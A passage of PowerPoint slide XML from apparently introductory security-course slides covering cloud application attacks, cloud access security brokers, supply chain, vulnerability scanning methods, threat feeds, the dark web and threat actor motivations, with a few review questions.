                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBEF8D2-9142-ACDD-9249-8C6B05E54D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="1612900"/>
            <a:ext cx="10018713" cy="5245100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud-based application attacks target applications hosted on cloud platforms and exploit potential vulnerabilities within these applications or the cloud infrastructure they run on to carry out malicious activities. Cloud-based application attacks generally involve the exploitation of misconfigurations in the cloud environment, weak authentication mechanisms, insufficient network segmentation, or poorly implemented access controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud As an Attack Platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Access Security Brokers (CASB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CASBs provide you with visibility into how clients and other network nodes are using cloud services. Some of the functions of a CASB are the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable single sign-on authentication and enforce access controls and authorizations from the enterprise network to the cloud provider.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan for malware and rogue or noncompliant device access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor and audit user and resource activity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigate data exfiltration by preventing access to unauthorized cloud services</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from managed devices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, CASBs are implemented in one of three ways:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Forward proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reverse proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Application programming interface (API)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39278080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1887-8466-874D-4527-3B2970B52091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Supply Chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59F5A5B-76B0-354B-B5CC-F6FAF31D51B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Service Providers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware Suppliers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Bill of Materials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dependency Analysis and SBOM Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87287813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3646A-D4DD-5919-476C-DBCD976758CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Application and Cloud Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CF454F-D99E-51EA-8160-3CA43D587CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your log shows that the Notepad process on a workstation running as the local administrator account has started an unknown process on an application server running as the SYSTEM account. What type of attack(s) are represented in this intrusion event?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do malicious updates introduce malware?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What type of attack is focused on exploiting the database access provided to a web application?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39241222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1376E-FE02-83B4-BE30-FECFBD968964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="0"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 8C - Vulnerability Identification Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F166224-175F-90B2-D6D2-F8B2194D3A51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="1752599"/>
            <a:ext cx="5255981" cy="4438651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Vulnerability scanning is a fundamental task within a vulnerability management program and utilizes automated scanning processes to identify and evaluate potential issues. Vulnerability scans focus on networks, operating systems, applications, and other functional areas to detect known vulnerabilities, including insecure configurations, outdated software versions, or missing security patches. Regular scanning is required to maintain an accurate picture of an organization’s security posture and to identify new vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Network Vulnerability Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 626">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D625B74-337B-7079-70D6-534A946F2064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876508" y="1752599"/>
            <a:ext cx="5096634" cy="3752850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83920429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72CF3-D789-EF9C-D30F-47A5030A032F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597817" y="419100"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Credentialed and Non-Credentialed Scans</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055CA94D-BBA2-4AC6-2F16-D5B5587B7A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the OS or application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A credentialed scan is given a user account with login rights to various hosts, plus whatever other permissions are appropriate for the testing routines.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 627">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB693155-0696-A6FC-3708-1931A6B782D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6607174" y="2000250"/>
            <a:ext cx="5280025" cy="4076700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182503598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D0539-27EB-24D8-8234-727CB16EE5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="190500"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Application and Web Application Scanners</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223DC1F9-7797-0881-0016-A13D532800B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="1562100"/>
            <a:ext cx="5353712" cy="5105399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similarly, application vulnerability scanning describes a specialized vulnerability scanning method for identifying software application weaknesses. This includes static analysis (reviewing application code without executing it) and dynamic analysis (testing running applications), which can identify issues like unvalidated inputs, broken access controls, and SQL injection vulnerabilities. Application vulnerability scanning is typically handled separately from general vulnerability scanning due to the unique nature of software applications and the specific types of vulnerabilities they introduce. General vulnerability scanning is designed to detect system-wide or network-wide weaknesses, such as out-of-date software or misconfigured firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Feeds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-Party Threat Feeds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information-Sharing Organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open-Source Intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBF2C55-2B65-F239-630D-77AEF140329D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838024" y="1943099"/>
            <a:ext cx="4974901" cy="4229101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24346565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04885-3FE7-496E-AB15-CB0545D10801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deep and Dark Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B37C3CE-1A96-AEE2-FBBB-E0490162CB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The deep web and dark web are also sources of threat intelligence. The deep web is any part of the World Wide Web that is not indexed by a search engine. This includes pages that require registration, pages that block search indexing, unlinked pages, pages using nonstandard DNS, and content encoded in a nonstandard manner. Within the deep web are areas that are deliberately concealed from “regular” browser access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dark Net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dark Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The dark web is generally associated with illicit activities and illegal content, but it also has legitimate purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privacy and Anonymity</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access to Censored Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Research and Information Sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 630">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF964B9-43DC-E714-995F-2731D2269DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6607175" y="1968500"/>
            <a:ext cx="5315266" cy="4432299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4206425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E03E-A62C-B8C7-96AC-A7D0C22ED220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Motivations of Threat Actors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0E34A8-5D16-1BAA-2E57-7BB30AD9C7BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Motivation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is the threat actor’s reason for perpetrating the attack. A malicious threat actor could be motivated by greed, curiosity, or some grievance, for instance. Threats can be characterized as structured/targeted or unstructured/opportunistic, depending on how widely an attack is perpetrated.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Chaotic Motivations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Financial Motivations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Political Motivations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189124432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DC1B5-802B-6C6C-238E-B99800D3D349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="0"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Other Vulnerability Assessment Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
